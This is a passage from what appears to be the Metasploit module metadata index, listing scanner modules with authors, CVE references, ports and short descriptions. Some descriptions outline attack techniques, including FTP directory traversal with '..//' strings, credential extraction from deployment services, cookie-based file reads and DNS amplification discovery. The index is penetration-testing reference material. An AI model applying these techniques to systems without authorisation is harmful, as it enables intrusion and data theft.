"is_install_path": true,
"ref_name": "scanner/dcerpc/hidden",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/dcerpc/management": {
"name": "Remote Management Interface Discovery",
"full_name": "auxiliary/scanner/dcerpc/management",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module can be used to obtain information from the Remote\n Management Interface DCERPC service.",
"references": [
],
"platform": "",
"arch": "",
"rport": 135,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/dcerpc/management.rb",
"is_install_path": true,
"ref_name": "scanner/dcerpc/management",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/dcerpc/tcp_dcerpc_auditor": {
"name": "DCERPC TCP Service Auditor",
"full_name": "auxiliary/scanner/dcerpc/tcp_dcerpc_auditor",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Determine what DCERPC services are accessible over a TCP port",
"references": [
],
"platform": "",
"arch": "",
"rport": 135,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb",
"is_install_path": true,
"ref_name": "scanner/dcerpc/tcp_dcerpc_auditor",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/dcerpc/windows_deployment_services": {
"name": "Microsoft Windows Deployment Services Unattend Retrieval",
"full_name": "auxiliary/scanner/dcerpc/windows_deployment_services",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module retrieves the client unattend file from Windows\n Deployment Services RPC service and parses out the stored credentials.\n Tested against Windows 2008 R2 x64 and Windows 2003 x86.",
"references": [
"MSDN-http://msdn.microsoft.com/en-us/library/dd891255(prot.20).aspx",
"URL-http://rewtdance.blogspot.co.uk/2012/11/windows-deployment-services-clear-text.html"
],
"platform": "",
"arch": "",
"rport": 5040,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb",
"is_install_path": true,
"ref_name": "scanner/dcerpc/windows_deployment_services",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/dect/call_scanner": {
"name": "DECT Call Scanner",
"full_name": "auxiliary/scanner/dect/call_scanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"DK <privilegedmode@gmail.com>"
],
"description": "This module scans for active DECT calls",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/dect/call_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/dect/call_scanner",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/dect/station_scanner": {
"name": "DECT Base Station Scanner",
"full_name": "auxiliary/scanner/dect/station_scanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"DK <privilegedmode@gmail.com>"
],
"description": "This module scans for DECT base stations",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/dect/station_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/dect/station_scanner",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/discovery/arp_sweep": {
"name": "ARP Sweep Local Network Discovery",
"full_name": "auxiliary/scanner/discovery/arp_sweep",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"belch"
],
"description": "Enumerate alive Hosts in local network using ARP requests.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-10-31 04:53:14 +0000",
"path": "/modules/auxiliary/scanner/discovery/arp_sweep.rb",
"is_install_path": true,
"ref_name": "scanner/discovery/arp_sweep",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/discovery/empty_udp": {
"name": "UDP Empty Prober",
"full_name": "auxiliary/scanner/discovery/empty_udp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "Detect UDP services that reply to empty probes",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/discovery/empty_udp.rb",
"is_install_path": true,
"ref_name": "scanner/discovery/empty_udp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/discovery/ipv6_multicast_ping": {
"name": "IPv6 Link Local/Node Local Ping Discovery",
"full_name": "auxiliary/scanner/discovery/ipv6_multicast_ping",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wuntee"
],
"description": "Send a ICMPv6 ping request to all default multicast addresses, and wait to see who responds.",
"references": [
"URL-http://wuntee.blogspot.com/2010/12/ipv6-ping-host-discovery-metasploit.html"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb",
"is_install_path": true,
"ref_name": "scanner/discovery/ipv6_multicast_ping",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/discovery/ipv6_neighbor": {
"name": "IPv6 Local Neighbor Discovery",
"full_name": "auxiliary/scanner/discovery/ipv6_neighbor",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"belch"
],
"description": "Enumerate local IPv6 hosts which respond to Neighbor Solicitations with a link-local address.\n Note, that like ARP scanning, this usually cannot be performed beyond the local\n broadcast network.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-10-31 04:53:14 +0000",
"path": "/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb",
"is_install_path": true,
"ref_name": "scanner/discovery/ipv6_neighbor",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/discovery/ipv6_neighbor_router_advertisement": {
"name": "IPv6 Local Neighbor Discovery Using Router Advertisement",
"full_name": "auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wuntee",
"d0lph1n98"
],
"description": "Send a spoofed router advertisement with high priority to force hosts to\n start the IPv6 address auto-config. Monitor for IPv6 host advertisements,\n and try to guess the link-local address by concatenating the prefix, and\n the host portion of the IPv6 address. Use NDP host solicitation to\n determine if the IP address is valid'",
"references": [
"URL-http://wuntee.blogspot.com/2010/11/ipv6-link-local-host-discovery-concept.html"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb",
"is_install_path": true,
"ref_name": "scanner/discovery/ipv6_neighbor_router_advertisement",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/discovery/udp_probe": {
"name": "UDP Service Prober",
"full_name": "auxiliary/scanner/discovery/udp_probe",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Detect common UDP services using sequential probes",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-05-31 14:32:31 +0000",
"path": "/modules/auxiliary/scanner/discovery/udp_probe.rb",
"is_install_path": true,
"ref_name": "scanner/discovery/udp_probe",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/discovery/udp_sweep": {
"name": "UDP Service Sweeper",
"full_name": "auxiliary/scanner/discovery/udp_sweep",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Detect interesting UDP services",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/discovery/udp_sweep.rb",
"is_install_path": true,
"ref_name": "scanner/discovery/udp_sweep",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/dlsw/dlsw_leak_capture": {
"name": "Cisco DLSw Information Disclosure Scanner",
"full_name": "auxiliary/scanner/dlsw/dlsw_leak_capture",
"rank": 300,
"disclosure_date": "2014-11-17",
"type": "auxiliary",
"author": [
"Tate Hansen",
"John McLeod",
"Kyle Rainey"
],
"description": "This module implements the DLSw information disclosure retrieval. There\n is a bug in Cisco's DLSw implementation affecting 12.x and 15.x trains\n that allows an unauthenticated remote attacker to retrieve the partial\n contents of packets traversing a Cisco router with DLSw configured\n and active.",
"references": [
"CVE-2014-7992",
"URL-https://github.com/tatehansen/dlsw_exploit"
],
"platform": "",
"arch": "",
"rport": 2067,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb",
"is_install_path": true,
"ref_name": "scanner/dlsw/dlsw_leak_capture",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/dns/dns_amp": {
"name": "DNS Amplification Scanner",
"full_name": "auxiliary/scanner/dns/dns_amp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "This module can be used to discover DNS servers which expose recursive\n name lookups which can be used in an amplification attack against a\n third party.",
"references": [
"CVE-2006-0987",
"CVE-2006-0988"
],
"platform": "",
"arch": "",
"rport": 53,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/dns/dns_amp.rb",
"is_install_path": true,
"ref_name": "scanner/dns/dns_amp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/elasticsearch/indices_enum": {
"name": "ElasticSearch Indices Enumeration Utility",
"full_name": "auxiliary/scanner/elasticsearch/indices_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Silas Cutler <Silas.Cutler@BlackListThisDomain.com>"
],
"description": "This module enumerates ElasticSearch Indices. It uses the REST API\n in order to make it.",
"references": [
],
"platform": "",
"arch": "",
"rport": 9200,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/elasticsearch/indices_enum.rb",
"is_install_path": true,
"ref_name": "scanner/elasticsearch/indices_enum",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/emc/alphastor_devicemanager": {
"name": "EMC AlphaStor Device Manager Service",
"full_name": "auxiliary/scanner/emc/alphastor_devicemanager",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module queries the remote host for the EMC Alphastor Device Management Service.",
"references": [
],
"platform": "",
"arch": "",
"rport": 3000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb",
"is_install_path": true,
"ref_name": "scanner/emc/alphastor_devicemanager",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/emc/alphastor_librarymanager": {
"name": "EMC AlphaStor Library Manager Service",
"full_name": "auxiliary/scanner/emc/alphastor_librarymanager",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module queries the remote host for the EMC Alphastor Library Management Service.",
"references": [
],
"platform": "",
"arch": "",
"rport": 3500,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb",
"is_install_path": true,
"ref_name": "scanner/emc/alphastor_librarymanager",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/etcd/open_key_scanner": {
"name": "Etcd Keys API Information Gathering",
"full_name": "auxiliary/scanner/etcd/open_key_scanner",
"rank": 300,
"disclosure_date": "2018-03-16",
"type": "auxiliary",
"author": [
"Giovanni Collazo <hello@gcollazo.com>",
"h00die"
],
"description": "This module queries the etcd API to recursively retrieve all of the stored\n key value pairs. Etcd by default does not utilize authentication.",
"references": [
"URL-https://elweb.co/the-security-footgun-in-etcd"
],
"platform": "",
"arch": "",
"rport": 2379,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
2379
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-04-04 10:52:47 +0000",
"path": "/modules/auxiliary/scanner/etcd/open_key_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/etcd/open_key_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/etcd/version": {
"name": "Etcd Version Scanner",
"full_name": "auxiliary/scanner/etcd/version",
"rank": 300,
"disclosure_date": "2018-03-16",
"type": "auxiliary",
"author": [
"Giovanni Collazo <hello@gcollazo.com>",
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module connections to etcd API endpoints, typically on 2379/TCP, and attempts\n to obtain the version of etcd.",
"references": [
"URL-https://elweb.co/the-security-footgun-in-etcd"
],
"platform": "",
"arch": "",
"rport": 2379,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
2379
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-04-04 11:01:38 +0000",
"path": "/modules/auxiliary/scanner/etcd/version.rb",
"is_install_path": true,
"ref_name": "scanner/etcd/version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/finger/finger_users": {
"name": "Finger Service User Enumerator",
"full_name": "auxiliary/scanner/finger/finger_users",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Identify valid users through the finger service using a variety of tricks",
"references": [
],
"platform": "",
"arch": "",
"rport": 79,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-02-20 15:48:00 +0000",
"path": "/modules/auxiliary/scanner/finger/finger_users.rb",
"is_install_path": true,
"ref_name": "scanner/finger/finger_users",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ftp/anonymous": {
"name": "Anonymous FTP Access Detection",
"full_name": "auxiliary/scanner/ftp/anonymous",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Matteo Cantoni <goony@nothink.org>"
],
"description": "Detect anonymous (read/write) FTP server access.",
"references": [
"URL-http://en.wikipedia.org/wiki/File_Transfer_Protocol#Anonymous_FTP"
],
"platform": "",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ftp/anonymous.rb",
"is_install_path": true,
"ref_name": "scanner/ftp/anonymous",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ftp/bison_ftp_traversal": {
"name": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure",
"full_name": "auxiliary/scanner/ftp/bison_ftp_traversal",
"rank": 300,
"disclosure_date": "2015-09-28",
"type": "auxiliary",
"author": [
"Jay Turla",
"James Fitts",
"Brad Wolfe <brad.wolfe@gmail.com>"
],
"description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'",
"references": [
"EDB-38341",
"CVE-2015-7602"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/ftp/bison_ftp_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ftp/colorado_ftp_traversal": {
"name": "ColoradoFTP Server 1.3 Build 8 Directory Traversal Information Disclosure",
"full_name": "auxiliary/scanner/ftp/colorado_ftp_traversal",
"rank": 300,
"disclosure_date": "2016-08-11",
"type": "auxiliary",
"author": [
"h00die <mike@shorebreaksecurity.com>",
"RvLaboratory"
],
"description": "This module exploits a directory traversal vulnerability found in ColoradoFTP server\n version <= 1.3 Build 8. This vulnerability allows an attacker to download and upload arbitrary files\n from the server GET/PUT command including file system traversal strings starting with '\\\\'.\n The server is written in Java and therefore platform independent, however this vulnerability is only\n exploitable on the Windows version.",
"references": [
"EDB-40231",
"URL-https://bitbucket.org/nolife/coloradoftp/commits/16a60c4a74ef477cd8c16ca82442eaab2fbe8c86",
"URL-http://www.securityfocus.com/archive/1/539186"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2017-12-11 14:40:09 +0000",
"path": "/modules/auxiliary/scanner/ftp/colorado_ftp_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/ftp/colorado_ftp_traversal",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/ftp/easy_file_sharing_ftp": {
"name": "Easy File Sharing FTP Server 3.6 Directory Traversal",
"full_name": "auxiliary/scanner/ftp/easy_file_sharing_ftp",
"rank": 300,
"disclosure_date": "2017-03-07",
"type": "auxiliary",
"author": [
"Ahmed Elhady Mohamed"
],
"description": "This module exploits a directory traversal vulnerability found in Easy File Sharing FTP Server Version 3.6 and Earlier.\n This vulnerability allows an attacker to download arbitrary files from the server by crafting\n a RETR command that includes file system traversal strings such as '../'",
"references": [
"CVE-2017-6510"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ftp/easy_file_sharing_ftp.rb",
"is_install_path": true,
"ref_name": "scanner/ftp/easy_file_sharing_ftp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ftp/ftp_login": {
"name": "FTP Authentication Scanner",
"full_name": "auxiliary/scanner/ftp/ftp_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"todb <todb@metasploit.com>"
],
"description": "This module will test FTP logins on a range of machines and\n report successful logins. If you have loaded a database plugin\n and connected to a database this module will record successful\n logins and hosts so you can track your access.",
"references": [
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2017-12-14 08:05:57 +0000",
"path": "/modules/auxiliary/scanner/ftp/ftp_login.rb",
"is_install_path": true,
"ref_name": "scanner/ftp/ftp_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ftp/ftp_version": {
"name": "FTP Version Scanner",
"full_name": "auxiliary/scanner/ftp/ftp_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Detect FTP Version.",
"references": [
],
"platform": "",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ftp/ftp_version.rb",
"is_install_path": true,
"ref_name": "scanner/ftp/ftp_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ftp/konica_ftp_traversal": {
"name": "Konica Minolta FTP Utility 1.00 Directory Traversal Information Disclosure",
"full_name": "auxiliary/scanner/ftp/konica_ftp_traversal",
"rank": 300,
"disclosure_date": "2015-09-22",
"type": "auxiliary",
"author": [
"Jay Turla",
"James Fitts",
"Brad Wolfe <brad.wolfe@gmail.com>",
"shinnai"
],
"description": "This module exploits a directory traversal vulnerability found in Konica Minolta FTP Utility 1.0.\n This vulnerability allows an attacker to download arbitrary files from the server by crafting\n a RETR command that includes file system traversal strings such as '..//'",
"references": [
"EDB-38260",
"CVE-2015-7603",
"URL-http://shinnai.altervista.org/exploits/SH-0024-20150922.html"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/ftp/konica_ftp_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ftp/pcman_ftp_traversal": {
"name": "PCMan FTP Server 2.0.7 Directory Traversal Information Disclosure",
"full_name": "auxiliary/scanner/ftp/pcman_ftp_traversal",
"rank": 300,
"disclosure_date": "2015-09-28",
"type": "auxiliary",
"author": [
"Jay Turla",
"James Fitts",
"Brad Wolfe <brad.wolfe@gmail.com>"
],
"description": "This module exploits a directory traversal vulnerability found in PCMan FTP Server 2.0.7.\n This vulnerability allows an attacker to download arbitrary files from the server by crafting\n a RETR command that includes file system traversal strings such as '..//'",
"references": [
"EDB-38340",
"CVE-2015-7601"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/ftp/pcman_ftp_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ftp/titanftp_xcrc_traversal": {
"name": "Titan FTP XCRC Directory Traversal Information Disclosure",
"full_name": "auxiliary/scanner/ftp/titanftp_xcrc_traversal",
"rank": 300,
"disclosure_date": "2010-06-15",
"type": "auxiliary",
"author": [
"jduck <jduck@metasploit.com>",
"Brandon McCann @zeknox <bmccann@accuvant.com>"
],
"description": "This module exploits a directory traversal vulnerability in the XCRC command\n implemented in versions of Titan FTP up to and including 8.10.1125. By making\n sending multiple XCRC command, it is possible to disclose the contents of any\n file on the drive with a simple CRC \"brute force\" attack.\n\n Although the daemon runs with SYSTEM privileges, access is limited to files\n that reside on the same drive as the FTP server's root directory.",
"references": [
"CVE-2010-2426",
"OSVDB-65533",
"URL-https://seclists.org/bugtraq/2010/Jun/160"
],
"platform": "",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/ftp/titanftp_xcrc_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/gopher/gopher_gophermap": {
"name": "Gopher gophermap Scanner",
"full_name": "auxiliary/scanner/gopher/gopher_gophermap",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"h00die"
],
"description": "This module identifies Gopher servers, and processes the gophermap\n file which lists all the files on the server.",
"references": [
"URL-https://sdfeu.org/w/tutorials:gopher"
],
"platform": "",
"arch": "",
"rport": 70,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-10-20 09:44:07 +0000",
"path": "/modules/auxiliary/scanner/gopher/gopher_gophermap.rb",
"is_install_path": true,
"ref_name": "scanner/gopher/gopher_gophermap",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/h323/h323_version": {
"name": "H.323 Version Scanner",
"full_name": "auxiliary/scanner/h323/h323_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Detect H.323 Version.",
"references": [
],
"platform": "",
"arch": "",
"rport": 1720,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/h323/h323_version.rb",
"is_install_path": true,
"ref_name": "scanner/h323/h323_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/a10networks_ax_directory_traversal": {
"name": "A10 Networks AX Loadbalancer Directory Traversal",
"full_name": "auxiliary/scanner/http/a10networks_ax_directory_traversal",
"rank": 300,
"disclosure_date": "2014-01-28",
"type": "auxiliary",
"author": [
"xistence"
],
"description": "This module exploits a directory traversal flaw found in A10 Networks\n (Soft) AX Loadbalancer version 2.6.1-GR1-P5/2.7.0 or less. When\n handling a file download request, the xml/downloads class fails to\n properly check the 'filename' parameter, which can be abused to read\n any file outside the virtual directory. Important files include SSL\n certificates. This module works on both the hardware devices and the\n Virtual Machine appliances. IMPORTANT NOTE: This module will also delete the\n file on the device after downloading it. Because of this, the CONFIRM_DELETE\n option must be set to 'true' either manually or by script.",
"references": [
"OSVDB-102657",
"BID-65206",
"EDB-31261"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/a10networks_ax_directory_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/accellion_fta_statecode_file_read": {
"name": "Accellion FTA 'statecode' Cookie Arbitrary File Read",
"full_name": "auxiliary/scanner/http/accellion_fta_statecode_file_read",
"rank": 300,
"disclosure_date": "2015-07-10",
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a file disclosure vulnerability in the Accellion\n File Transfer appliance. This vulnerability is triggered when a user-provided\n 'statecode' cookie parameter is appended to a file path that is processed as\n a HTML template. By prepending this cookie with directory traversal sequence\n and appending a NULL byte, any file readable by the web user can be exposed.\n The web user has read access to a number of sensitive files, including the\n system configuration and files uploaded to the appliance by users.\n This issue was confirmed on version FTA_9_11_200, but may apply to previous\n versions as well. This issue was fixed in software update FTA_9_11_210.",
"references": [
"URL-http://r-7.co/R7-2015-08",
"CVE-2015-2856"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb",
"is_install_path": true,
"ref_name": "scanner/http/accellion_fta_statecode_file_read",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/adobe_xml_inject": {
"name": "Adobe XML External Entity Injection",
"full_name": "auxiliary/scanner/http/adobe_xml_inject",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"CG <cg@carnal0wnage.com>"
],
"description": "Multiple Adobe Products -- XML External Entity Injection. Affected Software: BlazeDS 3.2 and\n earlier versions, LiveCycle 9.0, 8.2.1, and 8.0.1, LiveCycle Data Services 3.0, 2.6.1, and\n 2.5.1, Flex Data Services 2.0.1, ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2",
"references": [
"CVE-2009-3960",
"OSVDB-62292",
"BID-38197",
"URL-http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf",
"URL-http://www.adobe.com/support/security/bulletins/apsb10-05.html"
],
"platform": "",
"arch": "",
"rport": 8400,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/http/adobe_xml_inject.rb",
"is_install_path": true,
"ref_name": "scanner/http/adobe_xml_inject",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/advantech_webaccess_login": {
"name": "Advantech WebAccess Login",
"full_name": "auxiliary/scanner/http/advantech_webaccess_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will attempt to authenticate to Advantech WebAccess.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
